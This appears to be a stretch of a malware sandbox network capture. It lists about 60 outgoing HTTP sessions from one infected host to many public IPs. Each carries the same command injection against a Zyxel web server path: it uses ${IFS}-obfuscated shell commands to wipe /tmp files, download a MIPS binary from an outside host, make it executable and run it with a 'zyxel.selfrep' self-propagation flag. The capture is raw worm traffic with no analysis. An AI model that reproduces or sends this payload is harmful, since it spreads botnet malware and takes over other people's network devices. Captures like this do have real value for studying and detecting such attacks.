                                                Jan 12, 2024 18:24:38.936125040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5167192.168.2.134091212.125.189.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.936181068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5168192.168.2.1354508203.148.5.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.936259985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5169192.168.2.13562662.174.234.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.936300039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5170192.168.2.1351222188.196.230.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.936376095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5171192.168.2.1343756120.162.213.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.936434031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5172192.168.2.135607834.165.111.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.936499119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5173192.168.2.133386241.222.144.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.936547995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5174192.168.2.1335466209.137.51.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.936598063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5175192.168.2.133974053.242.215.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.936635017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5176192.168.2.133518020.60.232.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.936697006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5177192.168.2.1349200140.25.35.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.936758995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5178192.168.2.135678052.191.86.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.936821938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5179192.168.2.135191848.82.250.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.936878920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5180192.168.2.1357436216.239.107.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.936952114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5181192.168.2.134617848.33.137.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.937006950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5182192.168.2.1342048174.149.98.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.937067032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5183192.168.2.1351184198.197.218.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.937103987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5184192.168.2.1359942148.88.233.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.937145948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5185192.168.2.1357860213.186.80.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.937205076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5186192.168.2.1355862220.146.240.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.937247038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5187192.168.2.1345666122.66.90.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.937290907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5188192.168.2.1333622129.67.53.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.937328100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5189192.168.2.1337690162.36.90.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.937408924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5190192.168.2.134596095.21.216.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.937453032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5191192.168.2.136021896.136.3.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.937505007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5192192.168.2.136076078.79.244.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.937562943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5193192.168.2.1344292120.3.205.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.937612057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5194192.168.2.135950652.23.172.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.937674046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5195192.168.2.1360172208.171.202.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.937727928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5196192.168.2.1338326181.245.52.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.937782049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5197192.168.2.1339992100.224.220.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.937820911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5198192.168.2.1339832107.52.57.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.937917948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5199192.168.2.134236695.176.224.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.937937975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5200192.168.2.1339954125.12.239.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.937988997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5201192.168.2.1355954194.25.65.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.938055992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5202192.168.2.1355792108.44.208.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.938117981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5203192.168.2.135510845.52.208.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.938173056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5204192.168.2.1357672119.1.226.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.938224077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5205192.168.2.1338780217.112.214.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.938273907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5206192.168.2.1337346194.25.76.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.938359022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5207192.168.2.1341162135.74.221.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.938399076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5208192.168.2.135593086.240.191.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.938458920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5209192.168.2.135948039.8.39.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.938493967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5210192.168.2.135421870.56.125.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.938538074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5211192.168.2.134397235.62.115.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.938586950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5212192.168.2.135513051.5.239.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.938623905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5213192.168.2.13496144.187.66.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.938657045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5214192.168.2.1338114104.233.109.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.938693047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5215192.168.2.1335556135.140.66.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.938747883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5216192.168.2.1349990108.241.86.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.938791037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5217192.168.2.13572782.16.223.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.938863993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5218192.168.2.1345994163.108.133.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.938909054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5219192.168.2.134190461.239.11.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.938971043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5220192.168.2.1337322124.145.125.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.939047098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5221192.168.2.1335844223.30.165.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.939097881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5222192.168.2.1337092100.248.166.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.939157009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5223192.168.2.1351678142.191.160.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.939197063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5224192.168.2.1358746195.122.213.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.939254045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5225192.168.2.135826090.194.17.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.939291000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5226192.168.2.1356394184.173.48.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.939337015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5227192.168.2.1337242204.2.240.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.939393044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5228192.168.2.1358228172.65.26.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.939456940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5229192.168.2.1350180135.93.92.104443
                                                TimestampBytes transferredDirectionData
